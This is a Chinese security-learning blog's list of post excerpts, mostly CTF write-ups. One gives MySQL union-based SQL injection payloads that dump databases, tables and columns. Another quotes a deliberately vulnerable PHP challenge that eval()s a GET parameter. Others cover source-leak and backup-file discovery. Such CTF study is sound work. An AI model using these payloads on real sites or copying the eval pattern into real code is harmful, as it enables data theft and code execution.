- 博客(7)
- 收藏
- 关注
RSS订阅原创 mysql数据库,爆库、爆表、爆字段、爆值的语句
mysql数据库,爆库、爆表、爆字段、爆值的语句爆库:union select 1,2,3,database(); # 要看多少字段爆表:union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database(); # 爆字段:union select 1,2,3,group_concat(column_name) from information_...
2022-02-06 00:02:31
2797
原创 ctfshow web入门 命令执行29-32
web29<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}preg_match 函数用于执行一个正则表达式匹配。/i意味着不分大小写。本句含义是不能用flag值且忽略了大小写。说明对flag进行
2022-02-05 23:57:08
579
原创 ctfshow 入门web 信息搜集部分wp
web1右键查看源码 得到flagweb2 无法查看源代码通过Ctrl+u或者在url前面添加view-source:也可获得flag或直接bp抓包得到flagweb3bp抓包查看响应头得到flagweb4看提示 直接url后加robots.txt然后根据网页提示得到flagweb5直接url后加index.phps可参考WEB源码泄露 - NPFS - 博客园web6 根据提示要解压源代码所以在url后加www.zip解压下...
2022-02-05 23:25:24
305
原创 html按钮
autofocus:按钮获得焦点,值为:autofocus;disabled:禁用该按钮,值为:disabled;form:关联一个或多个表单,值为:表单的id属性值;formaction:提交表单时向何处发送表单数据,将覆盖form标签中的action属性,需与type="submit" 配合使用,值为:地址;formenctype:向服务器发送表单数据之前如何对其进行编码,将覆盖form表单中的enctype属性,需与type="submit"配合使用,只可以是:multipart/form-data、
2021-11-18 21:29:14
106
原创 攻防世界web备份文件
WEB页面告诉我们:你知道index.php的备份文件名吗?一般的网站备份文件都是这样的:1.rar1.zipdb.rardb.zipindex.php.bak...等等在网址后面加/以上的然后下载用记事本打开
2021-11-18 21:07:13
251
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人